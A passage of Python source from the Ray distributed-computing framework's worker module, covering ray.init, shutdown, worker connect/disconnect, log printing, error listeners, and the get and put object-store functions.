Defaults to 8265 and Ray will automatically find a free port if
8265 is not available.
job_config (ray.job_config.JobConfig): The job configuration.
configure_logging: True (default) if configuration of logging is
allowed here. Otherwise, the user may want to configure it
separately.
logging_level: Logging level, defaults to logging.INFO. Ignored unless
"configure_logging" is true.
logging_format: Logging format, defaults to string containing a
timestamp, filename, line number, and message. See the source file
ray_constants.py for details. Ignored unless "configure_logging"
is true.
log_to_driver (bool): If true, the output from all of the worker
processes on all nodes will be directed to the driver.
namespace (str): Namespace to use
runtime_env (dict): The runtime environment to use for this job (see
:ref:`runtime-environments` for details). This API is in beta
and may change before becoming stable.
_enable_object_reconstruction (bool): If True, when an object stored in
the distributed plasma store is lost due to node failure, Ray will
attempt to reconstruct the object by re-executing the task that
created the object. Arguments to the task will be recursively
reconstructed. If False, then ray.ObjectLostError will be
thrown.
_redis_max_memory: Redis max memory.
_plasma_directory: Override the plasma mmap file directory.
_node_ip_address (str): The IP address of the node that we are on.
_driver_object_store_memory (int): Deprecated.
_memory: Amount of reservable memory resource to create.
_redis_password (str): Prevents external clients without the password
from connecting to Redis if provided.
_temp_dir (str): If provided, specifies the root temporary
directory for the Ray process. Defaults to an OS-specific
conventional location, e.g., "/tmp/ray".
_metrics_export_port(int): Port number Ray exposes system metrics
through a Prometheus endpoint. It is currently under active
development, and the API is subject to change.
_system_config (dict): Configuration for overriding
RayConfig defaults. For testing purposes ONLY.
_tracing_startup_hook (str): If provided, turns on and sets up tracing
for Ray. Must be the name of a function that takes no arguments and
sets up a Tracer Provider, Remote Span Processors, and
(optional) additional instruments. See more at
docs.ray.io/tracing.html. It is currently under active development,
and the API is subject to change.
Returns:
If the provided address includes a protocol, for example by prepending
"ray://" to the address to get "ray://1.2.3.4:10001", then a
ClientContext is returned with information such as settings, server
versions for ray and python, and the dashboard_url. Otherwise,
returns address information about the started processes.
Raises:
Exception: An exception is raised if an inappropriate combination of
arguments is passed in.
"""
# If available, use RAY_ADDRESS to override if the address was left
# unspecified, or set to "auto" in the call to init
address_env_var = os.environ.get(
ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE)
if address_env_var:
if address is None or address == "auto":
address = address_env_var
logger.info(
f"Using address {address_env_var} set in the environment "
f"variable {ray_constants.RAY_ADDRESS_ENVIRONMENT_VARIABLE}")
if address is not None and "://" in address:
# Address specified a protocol, use ray client
builder = ray.client(address, _deprecation_warn_enabled=False)
# Forward any keyword arguments that were changed from their default
# values to the builder
init_sig = inspect.signature(init)
passed_kwargs = {}
for argument_name, param_obj in init_sig.parameters.items():
if argument_name in {"kwargs", "address"}:
# kwargs and address are handled separately
continue
default_value = param_obj.default
passed_value = locals()[argument_name]
if passed_value != default_value:
# passed value is different than default, pass to the client
# builder
passed_kwargs[argument_name] = passed_value
passed_kwargs.update(kwargs)
builder._init_args(**passed_kwargs)
return builder.connect()
if kwargs:
# User passed in extra keyword arguments but isn't connecting through
# ray client. Raise an error, since most likely a typo in keyword
unknown = ", ".join(kwargs)
raise RuntimeError(f"Unknown keyword argument(s): {unknown}")
# Try to increase the file descriptor limit, which is too low by
# default for Ray: https://github.com/ray-project/ray/issues/11239
try:
import resource
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < hard:
# https://github.com/ray-project/ray/issues/12059
soft = max(soft, min(hard, 65536))
logger.debug("Automatically increasing RLIMIT_NOFILE to max "
"value of {}".format(hard))
try:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except ValueError:
logger.debug("Failed to raise limit.")
soft, _ = resource.getrlimit(resource.RLIMIT_NOFILE)
if soft < 4096:
logger.warning(
"File descriptor limit {} is too low for production "
"servers and may result in connection errors. "
"At least 8192 is recommended. --- "
"Fix with 'ulimit -n 8192'".format(soft))
except ImportError:
logger.debug("Could not import resource module (on Windows)")
pass
if RAY_JOB_CONFIG_JSON_ENV_VAR in os.environ:
if runtime_env:
logger.warning(
"Both RAY_JOB_CONFIG_JSON_ENV_VAR and ray.init(runtime_env) "
"are provided, only using JSON_ENV_VAR to construct "
"job_config. Please ensure no runtime_env is used in driver "
"script's ray.init() when using job submission API.")
# Set runtime_env in job_config if passed as env variable, such as
# ray job submission with driver script executed in subprocess
job_config_json = json.loads(
os.environ.get(RAY_JOB_CONFIG_JSON_ENV_VAR))
job_config = ray.job_config.JobConfig.from_json(job_config_json)
# RAY_JOB_CONFIG_JSON_ENV_VAR is only set at ray job manager level and has
# higher priority in case user also provided runtime_env for ray.init()
elif runtime_env:
# Set runtime_env in job_config if passed in as part of ray.init()
if job_config is None:
job_config = ray.job_config.JobConfig()
job_config.set_runtime_env(runtime_env)
# Convert hostnames to numerical IP address.
if _node_ip_address is not None:
node_ip_address = services.address_to_ip(_node_ip_address)
raylet_ip_address = node_ip_address
if address:
redis_address, _, _ = services.validate_redis_address(address)
else:
redis_address = None
if configure_logging:
setup_logger(logging_level, logging_format)
if redis_address is not None:
logger.info(
f"Connecting to existing Ray cluster at address: {redis_address}")
if local_mode:
driver_mode = LOCAL_MODE
else:
driver_mode = SCRIPT_MODE
if global_worker.connected:
if ignore_reinit_error:
logger.info(
"Calling ray.init() again after it has already been called.")
return
else:
raise RuntimeError("Maybe you called ray.init twice by accident? "
"This error can be suppressed by passing in "
"'ignore_reinit_error=True' or by calling "
"'ray.shutdown()' prior to 'ray.init()'.")
_system_config = _system_config or {}
if not isinstance(_system_config, dict):
raise TypeError("The _system_config must be a dict.")
global _global_node
if redis_address is None:
# In this case, we need to start a new cluster.
ray_params = ray._private.parameter.RayParams(
redis_address=redis_address,
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
object_ref_seed=None,
driver_mode=driver_mode,
redirect_worker_output=None,
redirect_output=None,
num_cpus=num_cpus,
num_gpus=num_gpus,
resources=resources,
num_redis_shards=None,
redis_max_clients=None,
redis_password=_redis_password,
plasma_directory=_plasma_directory,
huge_pages=None,
include_dashboard=include_dashboard,
dashboard_host=dashboard_host,
dashboard_port=dashboard_port,
memory=_memory,
object_store_memory=object_store_memory,
redis_max_memory=_redis_max_memory,
plasma_store_socket_name=None,
temp_dir=_temp_dir,
# We need to disable it if runtime env is not set.
# Uploading happens after core worker is created. And we should
# prevent default worker being created before uploading.
# TODO (yic): Have a separate connection to gcs client when
# removal redis is done. The uploading should happen before this
# one.
start_initial_python_workers_for_first_job=(
job_config is None or job_config.runtime_env is None),
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port,
tracing_startup_hook=_tracing_startup_hook)
# Start the Ray processes. We set shutdown_at_exit=False because we
# shutdown the node in the ray.shutdown call that happens in the atexit
# handler. We still spawn a reaper process in case the atexit handler
# isn't called.
_global_node = ray.node.Node(
head=True,
shutdown_at_exit=False,
spawn_reaper=True,
ray_params=ray_params)
else:
# In this case, we are connecting to an existing cluster.
if num_cpus is not None or num_gpus is not None:
raise ValueError(
"When connecting to an existing cluster, num_cpus "
"and num_gpus must not be provided.")
if resources is not None:
raise ValueError("When connecting to an existing cluster, "
"resources must not be provided.")
if object_store_memory is not None:
raise ValueError("When connecting to an existing cluster, "
"object_store_memory must not be provided.")
if _system_config is not None and len(_system_config) != 0:
raise ValueError("When connecting to an existing cluster, "
"_system_config must not be provided.")
if _enable_object_reconstruction:
raise ValueError(
"When connecting to an existing cluster, "
"_enable_object_reconstruction must not be provided.")
# In this case, we only need to connect the node.
ray_params = ray._private.parameter.RayParams(
node_ip_address=node_ip_address,
raylet_ip_address=raylet_ip_address,
redis_address=redis_address,
redis_password=_redis_password,
object_ref_seed=None,
temp_dir=_temp_dir,
_system_config=_system_config,
enable_object_reconstruction=_enable_object_reconstruction,
metrics_export_port=_metrics_export_port)
_global_node = ray.node.Node(
ray_params,
head=False,
shutdown_at_exit=False,
spawn_reaper=False,
connect_only=True)
connect(
_global_node,
mode=driver_mode,
log_to_driver=log_to_driver,
worker=global_worker,
driver_object_store_memory=_driver_object_store_memory,
job_id=None,
namespace=namespace,
job_config=job_config)
if job_config and job_config.code_search_path:
global_worker.set_load_code_from_local(True)
else:
# Because `ray.shutdown()` doesn't reset this flag, for multiple
# sessions in one process, the 2nd `ray.init()` will reuse the
# flag of last session. For example:
# ray.init(load_code_from_local=True)
# ray.shutdown()
# ray.init()
# # Here the flag `load_code_from_local` is still True if we
# # doesn't have this `else` branch.
# ray.shutdown()
global_worker.set_load_code_from_local(False)
for hook in _post_init_hooks:
hook()
node_id = global_worker.core_worker.get_current_node_id()
return dict(_global_node.address_info, node_id=node_id.hex())
# Functions to run as callback after a successful ray init.
_post_init_hooks = []
@PublicAPI
@client_mode_hook(auto_init=False)
def shutdown(_exiting_interpreter: bool = False):
"""Disconnect the worker, and terminate processes started by ray.init().
This will automatically run at the end when a Python process that uses Ray
exits. It is ok to run this twice in a row. The primary use case for this
function is to cleanup state between tests.
Note that this will clear any remote function definitions, actor
definitions, and existing actors, so if you wish to use any previously
defined remote functions or actors after calling ray.shutdown(), then you
need to redefine them. If they were defined in an imported module, then you
will need to reload the module.
Args:
_exiting_interpreter (bool): True if this is called by the atexit hook
and false otherwise. If we are exiting the interpreter, we will
wait a little while to print any extra error messages.
"""
if _exiting_interpreter and global_worker.mode == SCRIPT_MODE:
# This is a duration to sleep before shutting down everything in order
# to make sure that log messages finish printing.
time.sleep(0.5)
disconnect(_exiting_interpreter)
# disconnect internal kv
if hasattr(global_worker, "gcs_client"):
del global_worker.gcs_client
_internal_kv_reset()
# We need to destruct the core worker here because after this function,
# we will tear down any processes spawned by ray.init() and the background
# IO thread in the core worker doesn't currently handle that gracefully.
if hasattr(global_worker, "core_worker"):
global_worker.core_worker.shutdown()
del global_worker.core_worker
# We need to reset function actor manager to clear the context
global_worker.function_actor_manager = FunctionActorManager(global_worker)
# Disconnect global state from GCS.
ray.state.state.disconnect()
# Shut down the Ray processes.
global _global_node
if _global_node is not None:
if _global_node.is_head():
_global_node.destroy_external_storage()
_global_node.kill_all_processes(check_alive=False, allow_graceful=True)
_global_node = None
# TODO(rkn): Instead of manually resetting some of the worker fields, we
# should simply set "global_worker" to equal "None" or something like that.
global_worker.set_mode(None)
atexit.register(shutdown, True)
# TODO(edoakes): this should only be set in the driver.
def sigterm_handler(signum, frame):
sys.exit(signum)
try:
ray._private.utils.set_sigterm_handler(sigterm_handler)
except ValueError:
logger.warning("Failed to set SIGTERM handler, processes might"
"not be cleaned up properly on exit.")
# Define a custom excepthook so that if the driver exits with an exception, we
# can push that exception to Redis.
normal_excepthook = sys.excepthook
def custom_excepthook(type, value, tb):
# If this is a driver, push the exception to GCS worker table.
if global_worker.mode == SCRIPT_MODE and hasattr(global_worker,
"worker_id"):
error_message = "".join(traceback.format_tb(tb))
worker_id = global_worker.worker_id
worker_type = gcs_utils.DRIVER
worker_info = {"exception": error_message}
ray.state.state._check_connected()
ray.state.state.add_worker(worker_id, worker_type, worker_info)
# Call the normal excepthook.
normal_excepthook(type, value, tb)
sys.excepthook = custom_excepthook
def print_to_stdstream(data):
print_file = sys.stderr if data["is_err"] else sys.stdout
print_worker_logs(data, print_file)
# Start time of this process, used for relative time logs.
t0 = time.time()
autoscaler_log_fyi_printed = False
def filter_autoscaler_events(lines: List[str]) -> Iterator[str]:
"""Given raw log lines from the monitor, return only autoscaler events.
Autoscaler events are denoted by the ":event_summary:" magic token.
"""
global autoscaler_log_fyi_printed
if not AUTOSCALER_EVENTS:
return
# Print out autoscaler events only, ignoring other messages.
for line in lines:
if ray_constants.LOG_PREFIX_EVENT_SUMMARY in line:
if not autoscaler_log_fyi_printed:
yield ("Tip: use `ray status` to view detailed "
"cluster status. To disable these "
"messages, set RAY_SCHEDULER_EVENTS=0.")
autoscaler_log_fyi_printed = True
# The event text immediately follows the ":event_summary:"
# magic token.
yield line.split(ray_constants.LOG_PREFIX_EVENT_SUMMARY)[1]
def time_string() -> str:
"""Return the relative time from the start of this job.
For example, 15m30s.
"""
delta = time.time() - t0
hours = 0
minutes = 0
while delta > 3600:
hours += 1
delta -= 3600
while delta > 60:
minutes += 1
delta -= 60
output = ""
if hours:
output += "{}h".format(hours)
if minutes:
output += "{}m".format(minutes)
output += "{}s".format(int(delta))
return output
# When we enter a breakpoint, worker logs are automatically disabled via this.
_worker_logs_enabled = True
def print_worker_logs(data: Dict[str, str], print_file: Any):
if not _worker_logs_enabled:
return
def prefix_for(data: Dict[str, str]) -> str:
"""The PID prefix for this log line."""
if data.get("pid") in ["autoscaler", "raylet"]:
return ""
else:
res = "pid="
if data.get("actor_name"):
res = data["actor_name"] + " " + res
elif data.get("task_name"):
res = data["task_name"] + " " + res
return res
def color_for(data: Dict[str, str], line: str) -> str:
"""The color for this log line."""
if data.get("pid") == "raylet":
return colorama.Fore.YELLOW
elif data.get("pid") == "autoscaler":
if "Error:" in line or "Warning:" in line:
return colorama.Style.BRIGHT + colorama.Fore.YELLOW
else:
return colorama.Style.BRIGHT + colorama.Fore.CYAN
else:
return colorama.Fore.CYAN
if data.get("pid") == "autoscaler":
pid = "scheduler +{}".format(time_string())
lines = filter_autoscaler_events(data.get("lines", []))
else:
pid = data.get("pid")
lines = data.get("lines", [])
if data.get("ip") == data.get("localhost"):
for line in lines:
print(
"{}{}({}{}){} {}".format(colorama.Style.DIM,
color_for(data,
line), prefix_for(data),
pid, colorama.Style.RESET_ALL, line),
file=print_file)
else:
for line in lines:
print(
"{}{}({}{}, ip={}){} {}".format(colorama.Style.DIM,
color_for(data, line),
prefix_for(data), pid,
data.get("ip"),
colorama.Style.RESET_ALL,
line),
file=print_file)
def listen_error_messages_raylet(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to the output queue.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
worker.error_message_pubsub_client = worker.redis_client.pubsub(
ignore_subscribe_messages=True)
# Exports that are published after the call to
# error_message_pubsub_client.subscribe and before the call to
# error_message_pubsub_client.listen will still be processed in the loop.
# Really we should just subscribe to the errors for this specific job.
# However, currently all errors seem to be published on the same channel.
error_pubsub_channel = gcs_utils.RAY_ERROR_PUBSUB_PATTERN
worker.error_message_pubsub_client.psubscribe(error_pubsub_channel)
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if we received a signal that we should stop.
if threads_stopped.is_set():
return
msg = worker.error_message_pubsub_client.get_message()
if msg is None:
threads_stopped.wait(timeout=0.01)
continue
pubsub_msg = gcs_utils.PubSubMessage.FromString(msg["data"])
error_data = gcs_utils.ErrorTableData.FromString(pubsub_msg.data)
job_id = error_data.job_id
if job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if (error_data.type == ray_constants.TASK_PUSH_ERROR):
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"listen_error_messages_raylet: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
worker.error_message_pubsub_client.close()
def listen_error_messages_from_gcs(worker, threads_stopped):
"""Listen to error messages in the background on the driver.
This runs in a separate thread on the driver and pushes (error, time)
tuples to be published.
Args:
worker: The worker class that this thread belongs to.
threads_stopped (threading.Event): A threading event used to signal to
the thread that it should exit.
"""
# TODO: we should just subscribe to the errors for this specific job.
worker.gcs_error_subscriber.subscribe()
try:
if _internal_kv_initialized():
# Get any autoscaler errors that occurred before the call to
# subscribe.
error_message = _internal_kv_get(DEBUG_AUTOSCALING_ERROR)
if error_message is not None:
logger.warning(error_message.decode())
while True:
# Exit if received a signal that the thread should stop.
if threads_stopped.is_set():
return
_, error_data = worker.gcs_error_subscriber.poll()
if error_data is None:
continue
if error_data.job_id not in [
worker.current_job_id.binary(),
JobID.nil().binary(),
]:
continue
error_message = error_data.error_message
if error_data.type == ray_constants.TASK_PUSH_ERROR:
# TODO(ekl) remove task push errors entirely now that we have
# the separate unhandled exception handler.
pass
else:
logger.warning(error_message)
except (OSError, ConnectionError) as e:
logger.error(f"listen_error_messages_from_gcs: {e}")
@PublicAPI
@client_mode_hook(auto_init=False)
def is_initialized() -> bool:
"""Check if ray.init has been called yet.
Returns:
True if ray.init has already been called and false otherwise.
"""
return ray.worker.global_worker.connected
def connect(node,
mode=WORKER_MODE,
log_to_driver=False,
worker=global_worker,
driver_object_store_memory=None,
job_id=None,
namespace=None,
job_config=None,
runtime_env_hash=0,
worker_shim_pid=0,
startup_token=0,
ray_debugger_external=False):
"""Connect this worker to the raylet, to Plasma, and to Redis.
Args:
node (ray.node.Node): The node to connect.
mode: The mode of the worker. One of SCRIPT_MODE, WORKER_MODE, and
LOCAL_MODE.
log_to_driver (bool): If true, then output from all of the worker
processes on all nodes will be directed to the driver.
worker: The ray.Worker instance.
driver_object_store_memory: Deprecated.
job_id: The ID of job. If it's None, then we will generate one.
job_config (ray.job_config.JobConfig): The job configuration.
runtime_env_hash (int): The hash of the runtime env for this worker.
worker_shim_pid (int): The PID of the process for setup worker
runtime env.
startup_token (int): The startup token of the process assigned to
it during startup as a command line argument.
ray_debugger_host (bool): The host to bind a Ray debugger to on
this worker.
"""
# Do some basic checking to make sure we didn't call ray.init twice.
error_message = "Perhaps you called ray.init twice by accident?"
assert not worker.connected, error_message
assert worker.cached_functions_to_run is not None, error_message
# Enable nice stack traces on SIGSEGV etc.
try:
if not faulthandler.is_enabled():
faulthandler.enable(all_threads=False)
except io.UnsupportedOperation:
pass # ignore
# Create a Redis client to primary.
# The Redis client can safely be shared between threads. However,
# that is not true of Redis pubsub clients. See the documentation at
# https://github.com/andymccurdy/redis-py#thread-safety.
worker.redis_client = node.create_redis_client()
worker.gcs_channel = gcs_utils.GcsChannel(redis_client=worker.redis_client)
worker.gcs_client = gcs_utils.GcsClient(worker.gcs_channel)
_initialize_internal_kv(worker.gcs_client)
ray.state.state._initialize_global_state(
node.redis_address, redis_password=node.redis_password)
worker.gcs_pubsub_enabled = gcs_pubsub_enabled()
worker.gcs_publisher = None
if worker.gcs_pubsub_enabled:
worker.gcs_publisher = GcsPublisher(
channel=worker.gcs_channel.channel())
worker.gcs_error_subscriber = GcsErrorSubscriber(
channel=worker.gcs_channel.channel())
worker.gcs_log_subscriber = GcsLogSubscriber(
channel=worker.gcs_channel.channel())
worker.gcs_function_key_subscriber = GcsFunctionKeySubscriber(
channel=worker.gcs_channel.channel())
# Initialize some fields.
if mode in (WORKER_MODE, RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
# We should not specify the job_id if it's `WORKER_MODE`.
assert job_id is None
job_id = JobID.nil()
else:
# This is the code path of driver mode.
if job_id is None:
job_id = ray.state.next_job_id()
if mode is not SCRIPT_MODE and mode is not LOCAL_MODE and setproctitle:
process_name = ray_constants.WORKER_PROCESS_TYPE_IDLE_WORKER
if mode is SPILL_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_SPILL_WORKER_IDLE)
elif mode is RESTORE_WORKER_MODE:
process_name = (
ray_constants.WORKER_PROCESS_TYPE_RESTORE_WORKER_IDLE)
setproctitle.setproctitle(process_name)
if not isinstance(job_id, JobID):
raise TypeError("The type of given job id must be JobID.")
# All workers start out as non-actors. A worker can be turned into an actor
# after it is created.
worker.node = node
worker.set_mode(mode)
# For driver's check that the version information matches the version
# information that the Ray cluster was started with.
try:
ray._private.services.check_version_info(worker.redis_client)
except Exception as e:
if mode == SCRIPT_MODE:
raise e
elif mode == WORKER_MODE:
traceback_str = traceback.format_exc()
ray._private.utils.publish_error_to_driver(
ray_constants.VERSION_MISMATCH_PUSH_ERROR,
traceback_str,
job_id=None,
redis_client=worker.redis_client,
gcs_publisher=worker.gcs_publisher)
worker.lock = threading.RLock()
driver_name = ""
log_stdout_file_path = ""
log_stderr_file_path = ""
interactive_mode = False
if mode == SCRIPT_MODE:
import __main__ as main
if hasattr(main, "__file__"):
driver_name = main.__file__
else:
interactive_mode = True
driver_name = "INTERACTIVE MODE"
elif not LOCAL_MODE:
raise ValueError(
"Invalid worker mode. Expected DRIVER, WORKER or LOCAL.")
redis_address, redis_port = node.redis_address.split(":")
gcs_options = ray._raylet.GcsClientOptions(
redis_address,
int(redis_port),
node.redis_password,
)
if job_config is None:
job_config = ray.job_config.JobConfig()
if namespace is not None:
ray._private.utils.validate_namespace(namespace)
# The namespace field of job config may have already been set in code
# paths such as the client.
job_config.set_ray_namespace(namespace)
# Make sure breakpoint() in the user's code will
# invoke the Ray debugger if we are in a worker or actor process
# (but not on the driver).
if mode == WORKER_MODE:
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb.set_trace"
else:
# Add hook to suppress worker logs during breakpoint.
os.environ["PYTHONBREAKPOINT"] = "ray.util.rpdb._driver_set_trace"
worker.ray_debugger_external = ray_debugger_external
# If it's a driver and it's not coming from ray client, we'll prepare the
# environment here. If it's ray client, the environment will be prepared
# at the server side.
if (mode == SCRIPT_MODE and not job_config.client_job
and job_config.runtime_env):
scratch_dir: str = worker.node.get_runtime_env_dir_path()
runtime_env = job_config.runtime_env or {}
runtime_env = upload_py_modules_if_needed(
runtime_env, scratch_dir, logger=logger)
runtime_env = upload_working_dir_if_needed(
runtime_env, scratch_dir, logger=logger)
# Remove excludes, it isn't relevant after the upload step.
runtime_env.pop("excludes", None)
job_config.set_runtime_env(runtime_env)
serialized_job_config = job_config.serialize()
worker.core_worker = ray._raylet.CoreWorker(
mode, node.plasma_store_socket_name, node.raylet_socket_name, job_id,
gcs_options, node.get_logs_dir_path(), node.node_ip_address,
node.node_manager_port, node.raylet_ip_address, (mode == LOCAL_MODE),
driver_name, log_stdout_file_path, log_stderr_file_path,
serialized_job_config, node.metrics_agent_port, runtime_env_hash,
worker_shim_pid, startup_token)
# Notify raylet that the core worker is ready.
worker.core_worker.notify_raylet()
if driver_object_store_memory is not None:
logger.warning("`driver_object_store_memory` is deprecated"
" and will be removed in the future.")
# Start the import thread
if mode not in (RESTORE_WORKER_MODE, SPILL_WORKER_MODE):
worker.import_thread = import_thread.ImportThread(
worker, mode, worker.threads_stopped)
worker.import_thread.start()
# If this is a driver running in SCRIPT_MODE, start a thread to print error
# messages asynchronously in the background. Ideally the scheduler would
# push messages to the driver's worker service, but we ran into bugs when
# trying to properly shutdown the driver's worker service, so we are
# temporarily using this implementation which constantly queries the
# scheduler for new error messages.
if mode == SCRIPT_MODE:
worker.listener_thread = threading.Thread(
target=listen_error_messages_from_gcs
if worker.gcs_pubsub_enabled else listen_error_messages_raylet,
name="ray_listen_error_messages",
args=(worker, worker.threads_stopped))
worker.listener_thread.daemon = True
worker.listener_thread.start()
if log_to_driver:
global_worker_stdstream_dispatcher.add_handler(
"ray_print_logs", print_to_stdstream)
worker.logger_thread = threading.Thread(
target=worker.print_logs, name="ray_print_logs")
worker.logger_thread.daemon = True
worker.logger_thread.start()
if mode == SCRIPT_MODE:
# Add the directory containing the script that is running to the Python
# paths of the workers. Also add the current directory. Note that this
# assumes that the directory structures on the machines in the clusters
# are the same.
# When using an interactive shell, there is no script directory.
if not interactive_mode:
script_directory = os.path.abspath(os.path.dirname(sys.argv[0]))
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, script_directory))
# In client mode, if we use runtime envs with "working_dir", then
# it'll be handled automatically. Otherwise, add the current dir.
if not job_config.client_job and not job_config.runtime_env_has_uris():
current_directory = os.path.abspath(os.path.curdir)
worker.run_function_on_all_workers(
lambda worker_info: sys.path.insert(1, current_directory))
# TODO(rkn): Here we first export functions to run, then remote
# functions. The order matters. For example, one of the functions to
# run may set the Python path, which is needed to import a module used
# to define a remote function. We may want to change the order to
# simply be the order in which the exports were defined on the driver.
# In addition, we will need to retain the ability to decide what the
# first few exports are (mostly to set the Python path). Additionally,
# note that the first exports to be defined on the driver will be the
# ones defined in separate modules that are imported by the driver.
# Export cached functions_to_run.
for function in worker.cached_functions_to_run:
worker.run_function_on_all_workers(function)
worker.cached_functions_to_run = None
# Setup tracing here
tracing_hook_val = worker.gcs_client.internal_kv_get(
b"tracing_startup_hook", ray_constants.KV_NAMESPACE_TRACING)
if tracing_hook_val is not None:
ray.util.tracing.tracing_helper._global_is_tracing_enabled = True
if not getattr(ray, "__traced__", False):
_setup_tracing = import_from_string(
tracing_hook_val.decode("utf-8"))
_setup_tracing()
ray.__traced__ = True
def disconnect(exiting_interpreter=False):
"""Disconnect this worker from the raylet and object store."""
# Reset the list of cached remote functions and actors so that if more
# remote functions or actors are defined and then connect is called again,
# the remote functions will be exported. This is mostly relevant for the
# tests.
worker = global_worker
if worker.connected:
# Shutdown all of the threads that we've started. TODO(rkn): This
# should be handled cleanly in the worker object's destructor and not
# in this disconnect method.
worker.threads_stopped.set()
if worker.gcs_pubsub_enabled:
worker.gcs_function_key_subscriber.close()
worker.gcs_error_subscriber.close()
worker.gcs_log_subscriber.close()
if hasattr(worker, "import_thread"):
worker.import_thread.join_import_thread()
if hasattr(worker, "listener_thread"):
worker.listener_thread.join()
if hasattr(worker, "logger_thread"):
worker.logger_thread.join()
worker.threads_stopped.clear()
worker._session_index += 1
global_worker_stdstream_dispatcher.remove_handler("ray_print_logs")
worker.node = None # Disconnect the worker from the node.
worker.cached_functions_to_run = []
worker.serialization_context_map.clear()
try:
ray_actor = ray.actor
except AttributeError:
ray_actor = None # This can occur during program termination
if ray_actor is not None:
ray_actor.ActorClassMethodMetadata.reset_cache()
@contextmanager
def _changeproctitle(title, next_title):
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(title)
try:
yield
finally:
if _mode() is not LOCAL_MODE:
setproctitle.setproctitle(next_title)
@DeveloperAPI
def show_in_dashboard(message: str, key: str = "", dtype: str = "text"):
"""Display message in dashboard.
Display message for the current task or actor in the dashboard.
For example, this can be used to display the status of a long-running
computation.
Args:
message (str): Message to be displayed.
key (str): The key name for the message. Multiple message under
different keys will be displayed at the same time. Messages
under the same key will be overridden.
data_type (str): The type of message for rendering. One of the
following: text, html.
"""
worker = global_worker
worker.check_connected()
acceptable_dtypes = {"text", "html"}
assert dtype in acceptable_dtypes, (
f"dtype accepts only: {acceptable_dtypes}")
message_wrapped = {"message": message, "dtype": dtype}
message_encoded = json.dumps(message_wrapped).encode()
worker.core_worker.set_webui_display(key.encode(), message_encoded)
# Global variable to make sure we only send out the warning once.
blocking_get_inside_async_warned = False
@PublicAPI
@client_mode_hook(auto_init=True)
def get(object_refs: Union[ray.ObjectRef, List[ray.ObjectRef]],
*,
timeout: Optional[float] = None) -> Union[Any, List[Any]]:
"""Get a remote object or a list of remote objects from the object store.
This method blocks until the object corresponding to the object ref is
available in the local object store. If this object is not in the local
object store, it will be shipped from an object store that has it (once the
object has been created). If object_refs is a list, then the objects
corresponding to each object in the list will be returned.
Ordering for an input list of object refs is preserved for each object
returned. That is, if an object ref to A precedes an object ref to B in the
input list, then A will precede B in the returned list.
This method will issue a warning if it's running inside async context,
you can use ``await object_ref`` instead of ``ray.get(object_ref)``. For
a list of object refs, you can use ``await asyncio.gather(*object_refs)``.
Args:
object_refs: Object ref of the object to get or a list of object refs
to get.
timeout (Optional[float]): The maximum amount of time in seconds to
wait before returning.
Returns:
A Python object or a list of Python objects.
Raises:
GetTimeoutError: A GetTimeoutError is raised if a timeout is set and
the get takes longer than timeout to return.
Exception: An exception is raised if the task that created the object
or that created one of the objects raised an exception.
"""
worker = global_worker
worker.check_connected()
if hasattr(
worker,
"core_worker") and worker.core_worker.current_actor_is_asyncio():
global blocking_get_inside_async_warned
if not blocking_get_inside_async_warned:
logger.warning("Using blocking ray.get inside async actor. "
"This blocks the event loop. Please use `await` "
"on object ref with asyncio.gather if you want to "
"yield execution to the event loop instead.")
blocking_get_inside_async_warned = True
with profiling.profile("ray.get"):
is_individual_id = isinstance(object_refs, ray.ObjectRef)
if is_individual_id:
object_refs = [object_refs]
if not isinstance(object_refs, list):
raise ValueError("'object_refs' must either be an object ref "
"or a list of object refs.")
# TODO(ujvl): Consider how to allow user to retrieve the ready objects.
values, debugger_breakpoint = worker.get_objects(
object_refs, timeout=timeout)
for i, value in enumerate(values):
if isinstance(value, RayError):
if isinstance(value, ray.exceptions.ObjectLostError):
worker.core_worker.dump_object_store_memory_usage()
if isinstance(value, RayTaskError):
raise value.as_instanceof_cause()
else:
raise value
if is_individual_id:
values = values[0]
if debugger_breakpoint != b"":
frame = sys._getframe().f_back
rdb = ray.util.pdb.connect_ray_pdb(
host=None,
port=None,
patch_stdstreams=False,
quiet=None,
breakpoint_uuid=debugger_breakpoint.decode()
if debugger_breakpoint else None,
debugger_external=worker.ray_debugger_external)
rdb.set_trace(frame=frame)
return values
@PublicAPI
@client_mode_hook(auto_init=True)
def put(value: Any, *,
_owner: Optional["ray.actor.ActorHandle"] = None) -> ray.ObjectRef:
"""Store an object in the object store.
The object may not be evicted while a reference to the returned ID exists.
Args:
value: The Python object to be stored.
_owner: The actor that should own this object. This allows creating
objects with lifetimes decoupled from that of the creating process.
Note that the owner actor must be passed a reference to the object
prior to the object creator exiting, otherwise the reference will
still be lost.
Returns:
The object ref assigned to this value.
"""
worker = global_worker
worker.check_connected()
if _owner is None:
serialize_owner_address = None
elif isinstance(_owner, ray.actor.ActorHandle):
# Ensure `ray.state.state.global_state_accessor` is not None
ray.state.state._check_connected()
owner_address = gcs_utils.ActorTableData.FromString(
ray.state.state.global_state_accessor.get_actor_info(
_owner._actor_id)).address
if len(owner_address.worker_id) == 0:
raise RuntimeError(
f"{_owner} is not alive, it's worker_id is empty!")
serialize_owner_address = owner_address.SerializeToString()
else:
raise TypeError(
